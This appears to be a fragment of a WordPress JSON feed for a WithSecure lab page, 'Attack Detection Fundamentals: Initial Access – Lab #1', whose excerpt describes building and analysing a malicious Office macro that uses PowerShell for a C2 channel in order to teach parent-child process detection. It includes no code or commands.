xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                <\/div>\n            <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>In the first lab of this series, we are going to build and analyse a malicious Excel\/Word macro that uses PowerShell to establish a C2 channel. The aim of this simulation will be to highlight the importance of the parent-child process analysis.<\/p>\n","protected":false},"author":3,"featured_media":0,"template":"","categories":[314,345],"labs_content_type":[317],"class_list":["post-10591","lab_item","type-lab_item","status-publish","hentry","category-attack-detection","category-network-security"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg 618w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-300x214.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-447x318.jpg 447w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-205x146.jpg 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/\u30e9\u30dc<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                           
                 <span class=\"wp-component-card-insight__category\">Network Security<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Attack Detection Fundamentals: Initial Access &#8211; Lab #1<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">In the first lab of this series, we are going to build and analyse a malicious Excel\/Word macro that uses PowerShell to establish a C2 channel. The aim of this simulation will be to highlight the importance of the parent-child process analysis.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-1\/\">\u3082\u3063\u3068\u8aad\u3080<\/a>            <\/div>\n            <\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/lab_item\/10591","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/users\/3"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/media?parent=10591"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/categories?post=10591"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/labs_content_type?post=10591"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}